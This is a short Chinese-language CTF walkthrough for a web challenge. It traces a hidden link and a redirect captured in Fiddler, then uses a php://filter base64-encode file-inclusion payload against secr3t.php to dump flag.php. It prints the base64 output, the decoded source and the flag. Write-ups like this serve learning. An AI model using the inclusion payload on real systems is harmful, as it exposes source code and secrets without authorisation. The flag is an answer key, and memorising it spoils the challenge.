前言:

这篇文章还是是为了帮助一些

像我这样的菜鸟

找到简单的题解

题目描述

解题工具:

fiddler或burpsuite抓包

解题过程:

又是要找秘密，

先检查一下源代码

发现了一个链接与背景颜色融合了 

点进去看看

找到了SECRET但肯定没这么简单

点击SECRET页面发生跳转

查阅结束了，

肯定是SECRET页面有跳转

回去查看代码

看到/action.php

看时间和状态码确实是跳转了

Fiddler抓一下

截取了跳转前的代码

发现secr3t.php去看一下

又是代码审核

这里用了filter伪协议，

当我们利用该协议查看flag.php时会把源代码爆出来

但是是base64加密后的

url secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

进入后是一堆base64字符

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7Nzc2YTA0ZGYtMzY5NS00OGRkLWE0YmItYjM3NzE3MzMxYzQ4fSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

解密看一下

解密网址是:在线解密base64

发现是一段html代码

从中发现flag

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈！你找到我了！可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{776a04df-3695-48dd-a4bb-b37717331c48}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>

flag{776a04df-3695-48dd-a4bb-b37717331c48}

完成